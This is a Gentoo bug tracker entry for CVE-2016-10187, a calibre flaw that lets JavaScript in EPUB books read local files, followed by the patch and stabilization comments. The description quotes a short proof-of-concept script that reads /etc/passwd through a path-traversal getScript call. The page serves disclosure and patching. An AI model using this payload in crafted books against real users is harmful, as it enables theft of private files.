Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 607836 (CVE-2016-10187) - <app-text/calibre-2.78.0: javascript in books can access files on the computer using XMLHttpRequest
Summary: <app-text/calibre-2.78.0: javascript in books can access files on the compute...
Status: RESOLVED FIXED
Alias: CVE-2016-10187
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
: Normal trivial (vote)
Assignee: Gentoo Security
URL: https://bugs.launchpad.net/calibre/+b...
Whiteboard: B4 [noglsa]
Keywords:
Depends on:
Blocks:
 
Reported: 2017-01-31 18:05 UTC by Thomas Deutschmann (RETIRED)
Modified: 2017-02-16 12:39 UTC (History)
3 users (show)

See Also:
Package list:
=app-text/calibre-2.78.0
Runtime testing required: ---
stable-bot: sanity-check+

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Thomas Deutschmann (RETIRED) gentoo-dev 2017-01-31 18:05:51 UTC 
From $URL:

Calibre can access the local files using javascript in epub file.

Code snippet:
> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>
> <script>
>     $.getScript( "../../../../../../../../etc/passwd", function( data, textStatus, jqxhr ) {
>         document.write('<h1>Your data</h1><pre>' + data + '</pre>');
>     });
> </script>

Attacker can steal any victim file and send to server.
Comment 1 Thomas Deutschmann (RETIRED) gentoo-dev 2017-01-31 18:12:00 UTC 
Upstream patch:

https://github.com/kovidgoyal/calibre/commit/3a89718664cb8cce0449d1758eee585ed0d0433c


@ Maintainer(s): Please bump to >=app-text/calibre-2.75.0.
Comment 3 Thomas Deutschmann (RETIRED) gentoo-dev 2017-02-13 01:35:18 UTC 
@ Maintainer(s): Can we already start stabilizing of =app-text/calibre-2.78.0?
Comment 4 Zac Medico gentoo-dev 2017-02-14 19:45:47 UTC 
Yes, please stabilize it.
Comment 5 Thomas Deutschmann (RETIRED) gentoo-dev 2017-02-14 20:53:20 UTC 
@ Arches,

please test and mark stable: =app-text/calibre-2.78.0
Comment 6 Agostino Sarubbo gentoo-dev 2017-02-15 11:53:19 UTC 
amd64 stable
Comment 7 Agostino Sarubbo gentoo-dev 2017-02-15 15:56:25 UTC 
x86 stable.

Maintainer(s), please cleanup.
Security, please vote.
Comment 9 Thomas Deutschmann (RETIRED) gentoo-dev 2017-02-16 12:39:49 UTC 
GLSA Vote: No

Repository is clean, all done!